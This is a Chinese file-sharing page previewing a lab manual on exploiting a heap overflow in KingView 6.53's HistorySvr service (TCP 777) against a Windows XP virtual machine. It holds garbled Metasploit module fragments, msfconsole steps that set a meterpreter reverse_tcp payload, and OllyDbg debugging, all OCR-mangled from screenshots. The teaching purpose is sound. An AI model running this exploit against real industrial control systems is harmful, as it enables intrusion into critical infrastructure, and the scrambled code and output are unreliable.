收藏
下载资源

工业互联网安全测试技术:应用测试实验文档.docx

上传人:太** 文档编号:86569563 上传时间:2023-04-14 格式:DOCX 页数:9 大小:598.31KB
返回 下载 相关 举报
工业互联网安全测试技术:应用测试实验文档.docx_第1页
第1页 / 共9页
工业互联网安全测试技术:应用测试实验文档.docx_第2页
第2页 / 共9页
点击查看更多>>
资源描述

《工业互联网安全测试技术:应用测试实验文档.docx》由会员分享,可在线阅读,更多相关《工业互联网安全测试技术:应用测试实验文档.docx(9页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、系统1应用测试实验文档实验原理此漏洞存在于组态王6.53软件的HistorySvr.exe进程中,这个软件服务程序在TCP 777 端口监听时收到一个超长请求,导致堆缓冲区溢出从而执行任何代码。实验目的通过网络上构造的针对组态王6.53软件的漏洞攻击程序,实现对软件的攻击以及执行 相关的操作。实验环境攻击机:Kali Linux虚拟机(环境自带)靶机:winxp sp3虚拟机(环境自带)组态王软件(软件资源包提供)Ollydbg软件1套(软件资源包提供)推荐课时数:2课时实验步骤步骤一:服务开启,测试版POC构造及导入(1)在winxp sp3虚拟机中安装组态王6.53工业软件,History

2、Svr.exe进程自动运行,翻开windows系统自带的cmd终端,输入命令:netstat-an,可以看到TCP 777端口已经开放,放,如下列图所示:1工 Windows XP Professional 1承 kalic C:VIND0TSsysteB32cBd.exeBEPMicrosoft Windows XP【版本 5.1.26001 版权所有 1985-2001 Microsoft Corp.C:Docunents and SettingsXAdninistratornetstat -anActiveConnectionsProtoLocal AddressForeign Addr

3、essStateTCP0.0.0.0:1350.0.0.0:0LISTENINGTCDa n n n-aac0.0.0.0:0LISTENINGTCP0.0.0.0:77710.0.0.0:0LISTENING0.0.0.0:0LISTENI NGTCP0.0.0.0:70010.0.0.0:0LISTENINGTCP0.0.0.0:70020.0.0.0:0LISTENINGTCP127.0.0.1:10250.0.0.0:0LISTENINGTCP192.168.21.141:1390.0.0.0:0LISTENINGUDP0.0.0.0:445UDP0.0.0.0:500*:UDP0.0

4、.0.0:1029UDP0.0.0.0:4500M: MUDP0.0.0.0:7001M: MUDP127.0.0.1:123M: MUDP127.0.0.1:1900*: MUDP127.0.0.1:6001M: MUDP192.168.21.141:123M: MUDP192.168.21.141:1374UDP192.168.21.141:138UDP192.168.21.141:1900M: MUDP192.168.21.141:6001M: MC:Docunents and SettingsMidninistrator图1查看端口开放情况 通过网络获取漏洞poc (该poc文件会与资

5、源一起提交),用sublime翻开该文件 在 poc代码中增加新的目标,Ret值随便写一个和上面一样就行,如下列图所示:图2 poc文件更改traget 同时,仿照着增加如下代码,将shellcode的地址用“ABAC”替换,方便快速定位 shellcode,将修改后的 POC 保存为 kingview6.53overflow_attack.rb,如下列图所示:main.py一 | start.pystop.py64isploit - make_nops( 32812)65 sploit-HxEBxl0n66 sploit,x41,*667; sploit-HxADxBBxC3x77H681;

6、1sploit target.ret.pack( V )sploit - make_nops(8)70sploit - payload. encoded71;sploit nx44*( 1000-payload . encoded. length)72#this makes - the - app more - crashy, need - to* investigatev73#sploit make_nops(1000-payload.encoded.length) elsif-target.name-= /XP-SP3 CH/#sploit-make_nops(1024)sploit *m

7、ake_nops(1020)sploit-ABACusploit payload.encodedsploit -nx44*(31752-payload.encoded.length)sploittarget.ret.packVJ7475767778798081828384elsiftarget.name-=/XPSP3/86 j jsploit make_nops(1024)sploit payload.encoded89?sploit XxAA*(31752-payload.encoded.length)90#rand text alpha xxx() unfortunatelv makes

8、 it a bit unstable图3添加代码(4)在kali攻击机中,如下目录放入上诉构造的代码文件,如下列图所示:-fliOR scada09:55 F 0dchrantech.webacce$s_ dashboard, file.upcodesys.gateway. server .traversaLrbcodesys.web.server.rbdelta-ia mgr. factorytink.csservic factorylink.vm_09.bof.rbe.rbkcxiks.webhmLsetactivexguid.rbig$s9.i9$ddtdserver.listdILrb

9、ig$sexec_17.rbindusoft.webstudio.exec.rbkingview6.S3overflow.rb设得国文件系统O Kali Linux am_ w网络D滔随网络realwinrbreatwin.on-fcs.loginrbrealwin.scpc.initialize.rbreatwin.scpc.txtevent.rbwinlog. runtime. 2.rbyokogawa.bkfsim.vhfdrbyokogawa.bkhodeq_bof.rb图4又件导入kali 输入命令:msfconsole进入msf,输入命令:reload_all加载模块,如下列图所示

10、:11 Windows XP Professionalkali飞 | _ 口,| | kalikali:/桌面scadakalikali:/桌面文件动作编辑查看帮助 kali)L-$ msfconsole! The following modules could not be loaded! .! ! Please see /home/kali/.msf4/logs/framework.log for details.3Kom SuperHack II LogonUser Name:Password:OK =+一 = 2099 exploits - 1129 auxiliary-357 pos

11、t+ = 592 payloads - 45 encoders-10nops+7 evasionMetasploit tip: You can upgrade a shell to a Meterpreter session on many platforms using sessions -u msf6 |图5进入msf控制台missingmsf6 reload_allReloading modules from all module paths .WARNING! The following modules could not be loaded!/usr/share/metasploit

12、-framework/modules/auxiliary/scanner/msmail/exchange_enum.go/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.goPlease see /home/kali/.msf4/logs/framework.log for details.:oDFo:,./ymMOdayMmy/.-dHJ5a

13、GFyZGVyIQ=+-* :sm0Destroy .No.Data*s:一+h2-Maintain. No. Persistence,h+-:odNo2 * Above. All. Else. Do. No. Harm Ndo:./etc/shadow.0days-Data%20OR%201 = l-.No.0MN8/.+SecKCoin+e.AMd-:/+hbove.913.ElsMNh+-/.ssh/id_rsa.Des- dopeAW.Noo we*re.all.alike PLACEDRINKHERE!: msfexploit -j.srwxrwx:-.*.Ac816/NT_AUTH

14、ORITY.Do 09.14.2011.raid hevnsntSurb025N. OUTHOUSE- -s: $nmap -oS Awsm.da:-/.ssh/id_rsa.Des- dopeAW.Noo we*re.all.alike PLACEDRINKHERE!: msfexploit -j.srwxrwx:-.*.Ac816/NT_AUTHORITY.Do 09.14.2011.raid hevnsntSurb025N. OUTHOUSE- -s: $nmap -oS Awsm.da:htN01UserWroteMe!- :is:TfliKC.sudo-.A:The.PFYroy.N

15、o.D7: yxp_cmdshell.Ab0: :Ns.BOB6ALICEes7: *MS146.52.No.Per:sENbove3101.404:*T:/shSYSTEM-.N: /STFU|wall.No.Pr: dNVRGOING2GIVUUP: /corykennedyData:SSo.6178306Ence: /shMTlbeats3o.No.:图6重新加载模块步骤二:使用模块进行攻击 攻击机运行search kingviewM命令搜索漏洞,结果如下列图所示:msf6 search kingviewMatching ModulesCheck DescriptionNo KingVi

16、ew Log File Parsing Buffer OverflowNo Kingviev/ 6.53 SCADA HMI HistorySvr Heap Overflow# NameDisclosure Date Rank0 exploit/windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal1 exploit/windows/scada/kingview653overflow_attackgoodInteract with a module by name or index. For example info 1, use

17、1 or use exploit/windows/scada/kiigview653overflow_attack图7搜索攻击模块攻击机使用kingview653overflow_attack模块,执行如下操作:use exploit/windows/scada/kingview6.53overflow_attack :使用 kingview6.53overflow_attack 漏洞set payload :设置 payload, 这里选择 windows/meterpreter/reverse_tcpset Ihost :指定源IP地址(攻击机IP地址)set rhost :指定目的IP地

18、址(靶机IP地址)set target 2 :选择靶机操作系统效果图如下所示:msf6 use exploit/windows/scada/kingview6.53overflow_attack No results from searchFailed to load module: exploit/windows/scada/kingview6.53overflow_attack msf6 use exploit/windows/scada/kingview653overflow_attack k No payload configured, defaulting to windows/me

19、terpreter/reverse.tcp msf6 exploit() set payload windows/meterpreter/reverse_tcppayload = windows/meterpreter/reverse-tcpexploit(rhost = 192.168.21.135 msf6 exploit() set Ihost 192,168.21,141msf6 exploit( target = 2 msf6 exploit() set target 2) I图8攻击步骤(3)靶机通过QlyDbg捕获进程异常,在OllyDbg中开启、Just-in-time deb

20、ugging “,具体 操作如下列图所示:图9界面选择图10选项选择(4)攻击机输入“exploit”,执行攻击靶机的操作,如下列图所示:* Exploit completed, but no session was created.msf6 exploit() exploit* Started reverse TCP handler on 192.168.21.135:4444* 192.168.21.141:777 - Trying target Windows XP SP3 CH* Exploit completed, but no session was created.msf6 ex

21、ploit() |图11执行攻击回到靶机,OllyDbg捕获到进程异常,说明攻击执行成功。 进程中断在0x00384342处,异常的截图如下列图所示:图12异常点截图(5)点击视图中的内存按钮,进入内存页面,按快捷键ctrl + B进入内存字符查找模块,查找 步骤一构造的字符串“ABAC”,具体操作如下列图所示:53Debug Options Window Help贵国回国回司叫工竺|回/囚回回司用i=Jff|2Executable modulesAccess violation when readng |00A1 FB90 use ShiH+F7/F8/F9 to pass exceptio

22、n to programOllyDbgvl.10nou,eaxnou00384353 v 74 OF00384355WIL00Alt+L Alt+Eand dword ptr ds:esi*8,0cnp dword ptr ss:esp*C, 0nou mouOllyDbg - HistorySvr.exeesiesi,ecxdword ptr ss:esp+8 ecx,dword ptr ds:esi eax,dword ptr ds:ecxesinou esi,ecx1 I Memory 1Alt+M jThreadsWindowsHandlesPVAlt+C iSEH chainPatc

23、hesCtrl+P 1Call stackAlt+K 1BreakpointsAlt+B IVatchReferencesRun traceSourceSource filesFileText filePause Log倡 short nettrans.00384331 -1call nettrans.00381*337mou eax,esiesiBCT 8call dword ptr ds:eax*Cnou dword ptr ds:esi*8yeax esiptr ds:esi*8y0Q short nettrans.00384361* 阳ou trans.00383043图13内存界面选

24、项OllyDbg - HistorySvr. exe - lesory Map|M| File View Debug Options Window HelpI Pausedaj jll j _1!/回国回刊/回三|刈工|知到至且|回工旦自置I?Mapped asEEEEEEEEEEEEEEEEEEEEEEE R6R?GUGUGUGUlAlrIRIRVIIRrtIRrtIRrtIRViRRRRRRRRRRRRRRRRRRRRRRR vlvvlvlvlvlgggg 吝 gggggggggggggggggzl 1 ! p 1 1 1 aaaaaaaaaaaaaaaaaaaaaaa rrarrrrmm

25、mmmmmmmmmmmmmmmmmmmmm PPMPPPPIIIIIIIIIIIIIIIIIIIIIIIAddressSizeOwnerSectionContains012CE00000001000012CF00000001000stack of th012D00000000E000012EE00000001000012EF00000001000stack of th014CE00000001000014CF00000001000stack of th1000000000001000KingPE header100010000003E000King.textcode1003F000000090

26、00King.rdataimports, exp1004800000007000King.datadata1004F00000001000KingSHARED1005000000003000King.rsrcresources1005300000005000King.relocrelocations5AHC000000001000uxthemePE header5ADC100000030000uxtheme.textcode, import5ADF100000001000xix theme.datadata5ADF200000003000uxtheme.rsrcresources5ADF500

27、000002000uxtheme.relocrelocations5D17000000001000C0MCTE32PE header5D17100000071000C0MCTL32.textcode, import5D1E200000003000C0MCTL32.datadata5D1E500000020000C0MCTE32.rsrcresources5D20500000005000C0MCTL32.relocrelocations60FD000000001000hnetcfgPE header60FD10000003F000hnetcfg.textcode, import610100000

28、0001000hnetcfg.orpc6101100000001000hnetcfg.datadata610120000000E000hnetcfg.rsrcresources6102000000005000hnetcfg.relocrelocationsRestart program (CUI+F2)OllyDbg v1.10图14内存界面回 回刈可知史回包上1=|T|?JLccess I Ini ti all Mapped as碗前GUGU,GUgEEEEEEEEEEEEEEEEEEEEEET图15搜索字符串界面(6)等待内存搜寻一段时间成功定位到“ABAC”的位置,结果如下列图所示:Ol

29、lyDbg - HistorySvr.exe - Du*p - 7FFA0000.7FFD2FFF回 FileVi ew Debug Opti ons Window KelpPaused& XJ上IE回力四且回:j=7FFA2413I42 61 431161 44 61 45161 46 61 3F|100 3F 00 3F:=lE yiF a?.?. ?drAzqzj90 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F?. ?. ?. ?. ?7FFA243300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F?. ?.

30、 ?. ?. ?. ?. ?. ?7FFA244300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F.?. ?. ?. ?. ?. ?. ?. ?7FFA245300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F.?. ?. ?. ?. ?. ?. ?. ?7FFA246300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F.?. ?. ?. ?. ?. ?. ?. ?7FFA247300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F.?. ?.

31、 ?. ?. ?. ?. ?. ?7FFA248300 3F 00 3F00 3F 00 3F00 3F 00 3F00 3F 00 3F7FFA249300 3F 00 3F00 3F 00 3F00 3F 00 3F00 47 61 49Gal7FFA24A361 4B 61 4D61 4F 61 5061 52 61 5361 54 61 56aKaM aO aP aRaS aT aV7FFA24B361 57 61 5861 59 61 5A61 5B 61 5C61 5E 61 5FaW4aYaZaaaa_7FFA24C361 60 61 6161 63 61 6461 65 61

32、6661 69 61 6Aa aaacadaeafai aj7FFA24D361 6B 61 6C61 6D 61 6E61 6F 61 7161 72 61 73atalamanaoaqaras7FFA24E361 74 61 7661 78 61 7961 7A 61 7B61 7C 61 7Dat avax ay az a ala7FFA24F361 7E 61 7F61 80 61 8161 82 61 8361 84 61 85aa工悦。口 17FFA250361 86 61 8761 88 61 8961 8A 61 8C61 8D 61 8F对妥嗨妗端发突空7FFA251361

33、90 61 9161 92 61 9361 95 61 3F00 96 61 97a恒悭捶撰界? .枇7FFA252361 98 61 9961 9A 61 9B61 9C 61 9E61 9F 61 AO&秘槊徽:湫襟潦炫7FFA253361 Al 61 A261 A3 61 A461 A5 61 A661 AA 61 ABa制7FFA254361 All 61 AE61 AF 61 B061 Bl 61 B261 B3 61 B4展,紊疼痛股晶瑜7FFA255361 B5 61 B661 B8 61 B961 BA 61 BB61 BC 61 BD遵冽机党魂籥耦7FFA256361 BF

34、61 CO61 Cl 61 C361 C4 61 C561 C6 61 CT格曼然期胸般击芍7FFA257361 C9 61 CC61 CD 61 CE61 CF 61 DO61 D3 61 D5遹底蛹物蜥翥刖7FFA258361 D6 61 D761 D8 61 D961 DA 61 DB61 DC 61 DD凝潦狙朋越超堇7FFA259361 DE 61 DF61 E0 61 El61 E2 61 E361 E4 61 E5a轼逋涌篮祖铤7FFA25A361 E7 61 E861 E9 61 EA61 EB 61 EC61 ED 61 EEa输途即闾在急翻7FFA25B361 EF 61

35、F061 Fl 61 F261 F3 61 F461 F6 61 FTa飒睚航酷航隔蚓7FFA25C361 F8 61 F961 FA 61 FB61 FC 61 FD61 FE 61 00遮相狷鹃黠眺K.7FFA25D362 01 62 0262 03 62 0462 05 62 0762 09 62 13b rbib LbJb |b*b. bn7FFA25E362 14 62 1962 IC 62 ID62 IE 62 2062 23 62 26blbl-bbbb b#b&7FFA25F362 27 62 2862 29 62 2B62 2D 62 2F62 30 62 31b?b(b)b+b-b/bOblAccess violation when readina (001 FB 901 - use Shift+F7/F87F9 to oass exceoHon io oroaram图16定位字符串位置

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 应用文书 > 解决方案

本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

工信部备案号:黑ICP备15003705号© 2020-2023 www.taowenge.com 淘文阁